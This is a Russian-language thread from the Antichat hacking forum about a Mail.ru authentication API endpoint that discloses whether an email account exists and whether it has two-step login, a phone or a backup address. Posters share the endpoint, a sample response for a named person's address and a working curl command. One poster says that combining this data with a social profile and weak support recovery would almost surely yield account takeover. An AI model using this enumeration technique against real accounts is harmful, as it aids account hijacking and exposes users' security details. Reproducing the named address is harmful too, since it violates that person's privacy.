HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Mail(ру) мейл(ru)... wtf...
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.06.2021, 07:10
lifescore
Постоянный
Регистрация: 27.08.2011
Сообщений: 640
С нами: 7742486

Репутация: 72


По умолчанию
Ну вроде бы и да, и вроде бы и нет. Ну вы поняли...

.SpoilerTarget" type="button">Spoiler: не рановато комутеры ломать?
хедеры придумаете если что

https://auth.mail.ru/api/v1/pushauth/info

login=salyaev.n@mail.ru

Код:
{
  "status": 200,
  "htmlencoded": true,
  "email": "salyaev.n@mail.ru",
  "body": {
    "exists": true,
    "twostep": false,
    "can_push": false,
    "alt_email": false,
    "phone": false,
    "trusted": false,
    "available": false,
    "auth": "password",
    "provider": "default",
    "webauthn": [],
    "phones": [],
    "alt_emails": []
  }
}
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 24.06.2021, 18:25
devton
Участник форума
Регистрация: 26.10.2007
Сообщений: 283
С нами: 9758812

Репутация: 212
По умолчанию
зобавно...ровно 13 лет тому назад кодеры Рамблера той же ***ней страдали...история идет по спирали

/threads/73611/
 
Ответить с цитированием

  #3  
Старый 24.06.2021, 23:01
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию
Цитата:
Сообщение от lifescore  

вроде бы и нет
Кому-то Not Applicable влепили?

Цитата:
Сообщение от lifescore  

Ну вроде бы и да
Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но "... не получилось, не фартануло"

Цитата:
Сообщение от lifescore  

хедеры придумаете если что
Какие? Без шаманств всё работает:

Код:
curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq




Забавно:
 
Ответить с цитированием

  #4  
Старый 25.06.2021, 08:32
lifescore
Постоянный
Регистрация: 27.08.2011
Сообщений: 640
С нами: 7742486

Репутация: 72


По умолчанию
Цитата:
Сообщение от crlf  

Кому-то
Not Applicable
влепили?
Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но
"... не получилось, не фартануло
"
Какие? Без шаманств всё работает:
Код:
curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq


Забавно:

Всех спалил?)

С учетом как саппорт на recovery работал года два назад, мой мир профиль + эта инфа > 101% success

Про себя не забыли

Код:
{
  "status": 403,
  "htmlencoded": true,
  "email": "root@mail.ru",
  "body": "forbidden"
}
чур не я
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.